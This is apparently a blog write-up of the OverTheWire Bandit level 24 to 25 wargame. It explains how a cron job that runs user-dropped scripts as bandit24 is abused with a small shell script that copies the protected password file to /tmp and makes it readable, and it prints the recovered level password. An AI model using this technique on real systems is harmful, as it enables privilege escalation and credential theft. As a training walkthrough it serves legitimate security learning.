OverTheWire - Bandit: Level 24 to Level 25

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

Like before, the cron job calls a script in /usr/bin/ every minute

1 $ cat /etc/cron.d/cronjob_bandit24
2 @reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
3 * * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

The script has the following content:

1 cat /usr/bin/cronjob_bandit24.sh
2 #!/bin/bash
3 
4 myname=$(whoami)
5 
6 cd /var/spool/$myname/foo
7 echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
8 for i in * .*;
9 do
10     if [ "$i" != "." -a "$i" != ".." ];
11     then
12         echo "Handling $i"
13         owner="$(stat --format "%U" ./$i)"
14         if [ "${owner}" = "bandit23" ]; then
15             timeout -s 9 60 ./$i
16         fi
17         rm -f ./$i
18     fi
19 done

Let’s dissect what exactly this script does: The variable myname will be bandit24 since this is the user running the cronjob. So, the path operated on will be /var/spool/bandit24/foo. Then, for every file in this directory the owner will be checked. If the owner is bandit23 (our current user), the file will be executed for a maximum run time duration of 60 seconds until sig 9 will be sent to kill the process. Afterwards the file will be removed.

To “exploit” this, we can place our own shell script inside of this directory to run code as bandit24 and read the password which can be found at /etc/bandit_pass/bandit24. Easiest is something like copying the file to a known location and changing its ownership. Something like:

1 #! /bin/bash
2 cp /etc/bandit_pass/bandit24 /tmp/shoujin_bandit24
3 chmod og+r /tmp/shoujin_bandit24

This script must be made executable via chmod uog+x <script>

After a short waiting period we can read the password from the copied file.

1 $ cat /tmp/shoujin_bandit24
2 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar

Kategorien: #/writeups/; #/overthewire/

Tags: #/security/; #/hacking/; #/bash/; #/linux/; #/ctf/

1	$ cat /etc/cron.d/cronjob_bandit24
2	@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
3	* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

1	cat /usr/bin/cronjob_bandit24.sh
2	#!/bin/bash
3
4	myname=$(whoami)
5
6	cd /var/spool/$myname/foo
7	echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
8	for i in * .*;
9	do
10	if [ "$i" != "." -a "$i" != ".." ];
11	then
12	echo "Handling $i"
13	owner="$(stat --format "%U" ./$i)"
14	if [ "${owner}" = "bandit23" ]; then
15	timeout -s 9 60 ./$i
16	fi
17	rm -f ./$i
18	fi
19	done

1	#! /bin/bash
2	cp /etc/bandit_pass/bandit24 /tmp/shoujin_bandit24
3	chmod og+r /tmp/shoujin_bandit24

1	$ cat /tmp/shoujin_bandit24
2	VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar